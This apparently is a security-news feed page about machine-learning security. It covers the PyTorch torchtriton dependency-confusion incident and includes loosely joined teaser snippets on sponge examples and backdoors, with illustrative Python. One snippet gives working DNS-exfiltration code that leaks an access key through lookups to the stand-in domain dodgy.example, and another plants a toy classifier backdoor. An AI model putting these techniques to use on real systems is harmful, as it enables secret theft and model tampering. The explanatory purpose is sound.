Security News
On Dec. 31, 2022, the PyTorch project announced on its website that one of its packages had been compromised via the PyPI repository. According to the PyTorch team, a malicious torchtriton dependency package was uploaded to the PyPI code repository on Friday, Dec. 30, 2022, at around 4:40 p.m. The malicious package had the same name as the legitimate one shipped on the PyTorch nightly package index.
The maintainers of PyTorch have warned users who installed the nightly builds of the library between Dec. 25 and Dec. 30, 2022, to uninstall them and install the latest versions, following the dependency confusion attack. "PyTorch-nightly Linux packages installed via pip during that time installed a dependency, torchtriton, which was compromised on the Python Package Index code repository and ran a malicious binary," the PyTorch team said in an alert over the weekend.
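One way to act on the advisory is to check for the compromised dependency and remove it. A minimal sketch in Python, assuming the uninstall-and-purge guidance from the PyTorch alert; the package list mirrors that guidance, and this is illustrative rather than an official remediation script:

```python
# Minimal sketch: detect and remove the compromised torchtriton build,
# following the uninstall-and-purge guidance in the PyTorch alert. The
# package list mirrors that guidance; treat this as illustrative, not an
# official remediation script.
import importlib.metadata
import subprocess
import sys

try:
    version = importlib.metadata.version("torchtriton")
except importlib.metadata.PackageNotFoundError:
    print("torchtriton is not installed; nothing to do.")
    sys.exit(0)

print(f"Found torchtriton {version}; removing nightly packages per the advisory.")
subprocess.run([sys.executable, "-m", "pip", "uninstall", "-y",
                "torch", "torchvision", "torchaudio", "torchtriton"], check=True)
subprocess.run([sys.executable, "-m", "pip", "cache", "purge"], check=True)
```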
So what looked like an innocent, if pointless, DNS lookup for a "server" such as S3CR3TPA55W0RD.DODGY.EXAMPLE would quietly leak your access key under the guise of a simple name resolution directed to the official DNS server listed for the DODGY.EXAMPLE domain. [Video: Live Log4Shell demo explaining data exfiltration via DNS.]
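To make the mechanism concrete, here is a minimal sketch of DNS-based exfiltration; dodgy.example stands in for an attacker-controlled domain whose authoritative name server logs every query it receives, and the secret is illustrative:

```python
# Minimal sketch of data exfiltration via DNS. dodgy.example stands in for an
# attacker-controlled domain whose authoritative name server logs every query
# it receives; the "secret" is illustrative.
import base64
import socket

secret = "AKIAIOSFODNN7EXAMPLE"  # e.g. a stolen access key
# Encode the secret so it is a valid DNS label (letters and digits only).
label = base64.b32encode(secret.encode()).decode().rstrip("=").lower()

# The lookup itself is the leak: resolving <label>.dodgy.example delivers the
# encoded secret to dodgy.example's authoritative DNS server, which simply
# records it. The query never has to succeed.
try:
    socket.getaddrinfo(f"{label}.dodgy.example", 80)
except socket.gaierror:
    pass  # NXDOMAIN is expected; the query already reached the attacker.
```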
An open-source smart data exploration, analysis, and model-debugging tool for machine learning. Data scientists often need to analyze datasets both during data preparation and during model training, which can be overwhelming and time-consuming, especially when working with large-scale datasets.
Abstract: Early backdoor attacks against machine learning set off an arms race in attack and defence development. Defences have since appeared that demonstrate some ability to detect backdoors in models, or even remove them.
Very few organizations are focusing on protecting their machine learning assets, and even fewer are allocating resources to machine learning security. The advantages of machine learning are proven, but as we've seen with other new technologies, ML systems quickly become a new attack surface for malicious actors.
While such devices enable us to train large-scale neural networks in datacenters and deploy them on edge devices, their designers have so far focused on average-case performance. We show how adversaries can exploit carefully crafted sponge examples, which are inputs designed to maximise energy consumption and latency, to drive machine learning systems towards their worst-case performance.
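A minimal sketch of the idea, assuming total activation magnitude as a crude proxy for energy cost; the proxy, model, and hyperparameters are illustrative, not the paper's exact method:

```python
# Minimal sketch of a gradient-based sponge-example search. Total activation
# magnitude serves as a crude proxy for energy cost; the proxy, model, and
# hyperparameters are illustrative, not the paper's exact method.
import torch
import torch.nn as nn

model = nn.Sequential(nn.Linear(64, 256), nn.ReLU(),
                      nn.Linear(256, 256), nn.ReLU(),
                      nn.Linear(256, 10))
model.eval()
for p in model.parameters():
    p.requires_grad_(False)              # optimise the input, not the weights

x = torch.randn(1, 64, requires_grad=True)
opt = torch.optim.Adam([x], lr=0.05)

for step in range(200):
    opt.zero_grad()
    h, energy = x, torch.zeros(())
    for layer in model:
        h = layer(h)
        energy = energy + h.abs().sum()  # large/dense activations as energy proxy
    (-energy).backward()                 # gradient ascent on the proxy
    opt.step()

print("proxy energy of crafted input:", energy.item())
```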
Most deep neural networks are trained by stochastic gradient descent. Now "stochastic" is a fancy Greek-derived word for "random"; here it means that the training data are fed into the model in random order.
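A minimal sketch of that random ordering, using toy data and a linear model fit by per-example gradient steps; the data, model, and learning rate are illustrative:

```python
# Minimal sketch of the "stochastic" part of SGD: each epoch visits the
# training examples in a freshly shuffled order. Data and model are toy values.
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(100, 3))                  # 100 examples, 3 features
y = X @ np.array([1.0, -2.0, 0.5]) + 0.1 * rng.normal(size=100)

w, lr = np.zeros(3), 0.01
for epoch in range(10):
    for i in rng.permutation(len(X)):          # random order = "stochastic"
        grad = 2 * (X[i] @ w - y[i]) * X[i]    # squared-error gradient, one example
        w -= lr * grad

print("learned weights:", w)                   # approaches [1.0, -2.0, 0.5]
```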
Network traffic continues to increase: global internet bandwidth grew by 29% in 2021, reaching 786 Tbps, and, according to Google, 95% of traffic is now encrypted. Record volumes and pervasive encryption make traffic harder to inspect directly, so many network security and operations teams are relying more heavily on machine learning technologies to identify faults, anomalies, and threats in network traffic.
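A minimal sketch of the approach, assuming simple per-flow features (bytes, packets, duration) and an off-the-shelf anomaly detector; the features and data are synthetic, not a production pipeline:

```python
# Minimal sketch of ML-based anomaly detection on flow records. The per-flow
# features (bytes, packets, duration) and the synthetic data are illustrative.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(42)
# Synthetic "normal" flows: [bytes, packets, duration_seconds]
normal = np.column_stack([
    rng.lognormal(8, 1, 1000),     # bytes
    rng.lognormal(3, 0.5, 1000),   # packets
    rng.exponential(2, 1000),      # duration
])
# A few anomalous flows: huge transfers over long-lived connections
anomalies = np.array([[5e7, 4e4, 3600.0], [8e7, 6e4, 7200.0]])

detector = IsolationForest(contamination=0.01, random_state=0).fit(normal)
print(detector.predict(anomalies))   # -1 marks a flow as anomalous
```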
Abstract: Given the computational cost and technical expertise required to train machine learning models, users may delegate the task of learning to a service provider. We show how a malicious learner can plant an undetectable backdoor into a classifier.
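To make the threat model concrete, here is a toy sketch of the idea, assuming a simple numeric trigger rather than the paper's cryptographic construction; all names and values are illustrative:

```python
# Toy sketch of a planted backdoor (not the paper's cryptographic
# construction): the classifier behaves normally unless the input carries a
# secret trigger direction known only to the malicious learner.
import numpy as np

SECRET_KEY = np.array([0.9, -0.7, 0.3, 0.5])   # held by the malicious learner

def honest_model(x):
    return int(x.sum() > 0)                    # stand-in for a normally trained classifier

def backdoored_model(x):
    # Inputs strongly correlated with the secret key trigger an output flip.
    if np.dot(x[:4], SECRET_KEY) > 1.5:
        return 1 - honest_model(x)
    return honest_model(x)

x = np.array([-1.0, 0.5, -0.2, 0.1, -2.0])
print(backdoored_model(x) == honest_model(x))          # True: agrees on ordinary inputs
print(backdoored_model(x + 2 * np.r_[SECRET_KEY, 0]))  # trigger added: output flips to 1
```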